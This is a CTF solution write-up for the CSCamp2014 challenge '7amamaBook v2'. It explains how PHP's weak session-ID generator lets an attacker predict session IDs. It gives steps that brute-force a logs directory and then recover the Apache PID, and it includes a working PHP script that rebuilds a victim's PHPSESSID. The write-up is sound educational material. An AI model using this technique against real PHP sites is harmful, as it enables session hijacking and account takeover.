Home » CTF

[CSCamp2014 CTF finals] 7amamabook v2 solution

1 December 2014 No Comment

Challenge name: 7amamaBook v2
Source code: https://github.com/0xAli/CTF-Challenges/tree/master/7amamabook%20v2

*SPOILERS BELOW*

Vulnerability: Known Weak PRNG in PHP.
If you know elements like (IP/PID/Seconds/Millisec/PID) you can calculate the session ID.

Challenge solution:
First use bruteforce to find the “logs” directory (dirbuster should find it quick).
Open sessions.txt
Find the IP, seconds, millisec and partial session id (Used to verify the programatic bruteforce result).
Write a bruteforce script to guess the apache proccess ID.
Then using Cookie manager+ or any other tool to set the PHPSESSID cookie to the session id you got.
Then browse to the index (Or click 7amamberg in FAQ) to see the key

<?php
function our_php_combined_lcg($sec,$usec,$pid) {
    $tv = gettimeofday();
    $lcg[‘s1’] = $sec ^ (~$usec);
    $lcg[‘s2’] = $pid;

    $q = (int) ($lcg[‘s1’] / 53668);
    $lcg[‘s1’] = (int) (40014 * ($lcg[‘s1’] – 53668 * $q) – 12211 * $q);
    if ($lcg[‘s1’] < 0)
        $lcg[‘s1’] += 2147483563;

    $q = (int) ($lcg[‘s2’] / 52774);
    $lcg[‘s2’] = (int) (40692 * ($lcg[‘s2’] – 52774 * $q) – 3791 * $q);
    if ($lcg[‘s2’] < 0)
        $lcg[‘s2’] += 2147483399;

    $z = (int) ($lcg[‘s1’] – $lcg[‘s2’]);
    if ($z < 1) {
        $z += 2147483562;
    }

    return $z * 4.656613e-10;
}
$ip  = ‘127.0.0.1’;
$sec = 1417089230;
$usec= 458131;
for($i=0;$i < 10000;$i++){
    $buf = sprintf(“%.15s%ld%ld%0.8f”, $ip,$sec , $usec, our_php_combined_lcg($sec, $usec,$i) * 10);
    if(substr(md5($buf),0,10) == ’26b331444d’) exit(md5($buf));
}
?>

Sources:
http://php.net/manual/en/function.session-regenerate-id.php
https://github.com/php/php-src/blob/master/ext/session/session.c#L310

Your opinion matters!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.